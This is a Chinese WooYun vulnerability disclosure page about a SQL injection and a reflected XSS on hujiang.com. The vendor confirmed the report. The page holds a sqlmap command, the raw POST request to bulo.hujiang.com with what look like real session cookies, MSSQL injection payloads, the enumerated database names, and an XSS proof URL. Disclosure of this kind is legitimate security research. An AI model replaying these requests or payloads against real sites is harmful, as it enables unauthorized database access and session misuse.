当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165323

漏洞标题:沪江网某处SQL注入漏洞+反射型XSS

相关厂商:hujiang.com

漏洞作者: creep

提交时间:2015-12-29 21:14

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-29: 细节已通知厂商并且等待厂商处理中
2015-12-30: 厂商已经确认,细节仅向厂商公开
2016-01-09: 细节向核心白帽子及相关领域专家公开
2016-01-19: 细节向普通白帽子公开
2016-01-29: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

听说有礼物-w-

详细说明:

a.png


title是注入参数,注入包为1.txt,内容如下
sqlmap.py -r 1.txt

sqlmap identified the following injection point(s) with a total of 35 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Type=1
Title=1%' AND 3814=3814 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Type=1
Title=1%' AND 8834=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8834=8834) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(112)+CHAR(113))) AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012>


1.txt

POST /ajax/ASP.PageClass,App_Web_music_box.aspx.5df98d44.rasgroeb.ashx?p=rh9WhGz6z8TvuTfEaIBgigE0VSKHuMJQLgFc5JoJ-Pk1&_method=PageSearchMusic&_session=no HTTP/1.1
Host: bulo.hujiang.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://bulo.hujiang.com/app/music/%E4%B9%9D%E6%9C%88%E6%88%90%E6%AE%87/
Content-Length: 15
Content-Type: text/plain; charset=UTF-8
Cookie: _hotlink_uid=145106436134329; HJ_UID=df16267f-4618-bdb7-5117-120f8f46f8e4; TRACKSITEMAP=3%2C6%2C10%2C20%2C45%2C57%2C63%2C65%2C73%2C13%2C; _REF=; _SREF_10=http%3A%2F%2Fdict.hjenglish.com%2F; hj_token=s_daa18e800e251e3438da5c32193df0c7|MTE5NThkOA==; hjd_ajax_Language2011=en; __utma=249109652.1433456460.1451064409.1451064409.1451204932.2; __utmz=249109652.1451064409.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _SREF_6=http%3A%2F%2Fbulo.hujiang.com%2Fmenu%2F; ClubAuth=B83651E902FAAE8B8BCB9F8190710155E8D75A6ED1FAFD340097CC3AA015E2353EF999F57AF8D6168B7A9350F2A301418EED19ADF39ADDB54D5455A8DC31A0D3CBDBE9CE4966EE80E73348897F59ECC4E969B9A7905DF270CC7FFB4A2081E5088C23301C11FA65B98568E0F9B06D45093917A5918FA777920C5399A5360F6BCD107CCD0A337C685C243A7615DCEB3666FB476A92795E58C34FE99F68A1C12348022A4B62; _SREF_45=http%3A%2F%2Fms.hujiang.com%2Fdiary%2F; adsNewsTrueId=1663; news=true; _SREF_3=http%3A%2F%2Fms.hujiang.com%2Fdiary%2F; HJ_SID=9ef28c01-e16c-df99-25fb-3b5b95108673; HJ_CST=0; HJ_SSID_3=9d7120eb-9c1d-8a5f-eb4a-7735bb40782b; HJ_CSST_3=0; BuloMusicControl=0; _hotlink_source_track=http%3A//dict.hjenglish.com/; HJ_SSID_10=842075f2-5881-ae37-4a08-34e032bb0ba2; HJ_CSST_10=0; ingFrameHeight=1664; cck_lasttime=1451238877019; cck_count=0; bulo_tips_201208_nc=%7B%22tc%22%3A0%2C%22cc%22%3A0%2C%22fc%22%3A0%2C%22ac%22%3A0%2C%22pc%22%3A0%2C%22sc%22%3A0%2C%22mc%22%3A0%2C%22nc%22%3A0%2C%22st_atme%22%3A0%2C%22st_answer%22%3A0%2C%22st_sys%22%3A0%7D
DNT: 1
Connection: keep-alive
Type=1
Title=1*


sqlmap.py -r 1.txt --dbs

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
available databases [16]:
[*] DBCenter
[*] hj_cms
[*] HJ_Cms_App
[*] HJ_CmsExam
[*] hj_cmsLog
[*] HJ_CmsLogHistory
[*] HJ_CMSZhong
[*] HJ_Dict_New
[*] HJ_External
[*] HJ_K12SEOTiKu
[*] HJ_Lexicon
[*] HJ_Movie
[*] master
[*] model
[*] msdb
[*] tempdb


另外,反射型xss:
http://t.hujiang.com/star/all/?key=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

漏洞证明:

如上

修复方案:

你比我更加专业-w-

版权声明:转载请注明来源 creep@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-30 13:16

厂商回复:

问题确认,正在处理,感谢。上述数据库未涉及重要业务系统数据库,故评级为中。

最新状态:

暂无